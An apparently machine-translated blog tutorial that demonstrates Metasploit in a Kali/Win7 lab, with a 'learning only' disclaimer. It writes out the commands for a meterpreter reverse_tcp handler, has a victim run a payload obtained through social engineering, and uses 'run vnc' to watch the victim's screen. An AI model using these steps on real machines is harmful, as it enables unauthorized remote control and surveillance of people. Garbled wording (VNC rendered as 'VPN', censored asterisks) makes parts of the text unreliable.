The network security engineer demonstrates: It turns out that *** controls your computer like this! (under)

Statement before class:
1. This sharing is only for learning exchanges, please consciously abide by laws and regulations!
2. Search: Kali and programming, learn more online*** dry goods!
3. Kali and programming are updated on time every day, please learn and pay attention!
Text part
1. Background introduction
Metasploit is a vulnerability framework. Its full name is The Metasploit Framework, or MSF for short. As the most popular tool in the world, Metasploit is not only because of its convenience and power, but more importantly because of its framework. It allows users to develop their own vulnerability scripts for testing. How powerful is Metasploit (msf)? How to use VPN to control the victim host? Let us study together next!
2. Resource equipment
1. A Win7 virtual machine that has been installed and has been installed
2. A Xiaobai that is ready to go.
3. One installed Kali Linux virtual machine.
3. Strategic Arrangement
3.1 Use Metasploit (msf) *** framework to perform *** control on the target victim host, as shown in the figure below.
Step 1: Open the Metasploit (msf)*** test framework, as shown in the figure below.
Command: msfconsole
Insert picture description here

Step 2: Use the corresponding exploit module, as shown in the figure below. (Of course you can also use the search command to retrieve the corresponding vulnerability for exploitation)
Command: use exploit/multi/handler
Insert picture description here

Step 3: Set the payload connection method, as shown in the figure below.
Command: set payload windows/meterpreter/reverse_tcp
Insert picture description here

Step 4: View the parameters that need to be set for the *** module, as shown in the figure below.
Command: show options
Insert picture description here

Step 5: The *** parameters that need to be set are shown in the figure below.
Lhost: The host IP address of the host.
Insert picture description here

Step 6: Check the IP address of the host (Kali host) as shown in the figure below.
Command: ifconfig
Insert picture description here

Step 7: Set the corresponding parameters, as shown in the figure below.
Here is an example
command for setting lhost (host IP of the host) : set lhost IP
example: set lhost 192.168.78.144
Insert picture description here

Step 8: Check whether the corresponding parameters are set successfully, as shown in the figure below.
Command: show options
Insert picture description here

Step 9: Run the *** module, as shown in the figure below.
Command: run
Insert picture description here

3.2 Use social engineering related methods to induce users of the victim's host to start the *** file that their host has downloaded (for the experiment here, directly enter the victim's host and double-click to open it), as shown in the figure below.
Insert picture description here

3.3 As shown in the figure below, a corresponding session session is generated on the Kali*** host.
Insert picture description here

3.4 Use VPN to control the victim host, as shown in the figure below.
Step 1: Run the vnc program to monitor the target host, as shown in the figure below.
Command: run vnc
Insert picture description here

Step 2: As shown in the figure below, after running the command, the corresponding monitoring screen is displayed on the kali host, and every move of the victim's host can be monitored.
Insert picture description here
Insert picture description here
The editor typed each word and created it, but it was hard work. Could you please pay attention to me? You can also search for: Kali and programming to learn more *** skills! No piracy, please declare the source: Kali and programming
point I learn more Kali Linux*** testing and network*** practical skills!

Guess you like

Origin blog.51cto.com/14308022/2546322
Recommended